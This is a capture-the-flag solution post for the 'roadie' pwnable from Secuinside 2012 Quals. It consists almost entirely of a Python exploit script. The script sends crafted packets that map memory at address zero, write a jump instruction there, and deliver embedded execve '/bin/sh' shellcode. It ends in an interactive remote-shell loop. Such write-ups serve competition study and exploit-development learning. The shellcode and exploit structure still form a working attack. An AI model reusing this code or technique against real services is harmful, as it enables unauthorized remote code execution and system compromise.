Secuinside 2012 Quals - Roadie (Exploit only)

Category : Pwnables

nickname: roadie   HINT: 61.42.25.26:8080 (8181,8282,8383,8484,8585,8686,8787,8888,8989)   binary: http://61.42.25.26/roadie   CentOS 6.2 / randomize_va_space 2 / exec-shield 1  roadie

Summary : chain functions , allocate memory address 0 -> write byte code on memory address 0 -> call memory address 0

#!/usr/bin/python from socket import * from struct import pack , unpack import time ,  random def d(x):         return pack('<l',x) def w(x):         return pack('<h',x) def b(x):         return pack('<b',x) HOST = "127.0.0.1" PORT = 8383 SHELLCODE = "\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" ############################### CASE call  ############################# def gen_call(idx,addr): pSize = 0x244 pList = [] for i in range(pSize / 4): pList.append(d(0)) pList[0] = b(-1) + b(66) + b(66) + b(79) pList[2] = d(0) pList[3] = d(0x00007feb) # "\xeb\x7f" = jmp $ + 0x7f pList[4] = d(0x02000200) pList[5] = d(0x00000100) pList[6] = d(0x00000100) pList[7] = d(0x1234001f) pList[8] = d(0) pList[9] = d(-1) pList[10] = d(3) pList[11] = d(-12) pList[12] = d(0) pList[13] = d(-14) pList[14] = d(0x01090120) pList[15] = d(0) pList[16] = d(0x123) pList[17] = d(0) pList[18] = d(-1) pList[19] = d(0x00000101) pList[20] = d(8) pList[21] = d(8) pList[22] = d(-1) pList[23] = d(0xffff) pList[24] = d(0xffff0000) pList[25] = d(0x00b100a1) pList[26] = d(0x000000c1) pList[27] = d(0x000000d1) pList[28] = d(addr) # function addr pList[29] = d(0) pList[31] = d(0xcccccccc) pList[32] = d(0xdddddddd) pList[33] = d(0x0) pList[34] = d(idx+1) # index of loop payload = "".join(byte for byte in pList) return payload ############################################################################# ############################### CASE mmap ################################### def gen_mmap(idx , idx2 , value): pSize = 0x244 pList = [] for i in range(pSize / 4): pList.append(d(0)) pList[0] = b(-1) + b(66) + b(66) + b(79) pList[2] = d(0x00000000) pList[3] = d(1234) pList[4] = d(0x02000200) pList[5] = d(0x00000100) pList[6] = d(0x00000100) pList[7] = d(0x1234001e) pList[8] = d(0) pList[9] = d(-1) pList[10] = d(3) pList[11] = d(-12) pList[12] = d(0) pList[13] = d(-14) pList[14] = d(0x01090120) pList[15] = d(0) pList[16] = d(0x123) pList[17] = d(-4) pList[18] = d(0) pList[19] = d(0xffffffff) pList[20] = d(idx2) # index of new buffer to overwrite pList[21] = d(0) pList[22] = d(0x01) pList[23] = d(0x02) pList[24] = d(0x03) pList[25] = d(0x04) pList[26] = d(0x05) pList[27] = d(0x06) pList[28] = d(0x07) pList[29] = d(0x08) pList[30] = d(value)    # we can write this value pList[39] = d(0x33) pList[72] = d(-40) pList[73] = d(-24) pList[74] = d(-23) pList[75] = d(3) pList[76] = d(0) pList[77] = d(0) pList[78] = d(-126) pList[86] = d(idx+1) # index of loop payload = "".join(byte for byte in pList) return payload ####################### Main Procedure #################################### s = socket(AF_INET , SOCK_STREAM) s.connect((HOST , PORT)) raw_input("gogo?> ") values = [0xff , 0xe6] # jmp esi payload = "" for i in range(0,2): s.send(gen_mmap(i , i , values[i])) s.send(gen_call(2 , 0x0)[:35*4] + "\x90" * (0x244 - 35 * 4 - len(SHELLCODE)) + SHELLCODE) ############################# Got SHELL ###################################### while 1: cmd = raw_input("$ ") s.send(cmd + "\n") if cmd == "exit": break print s.recv(1024) ############################################################################## s.close()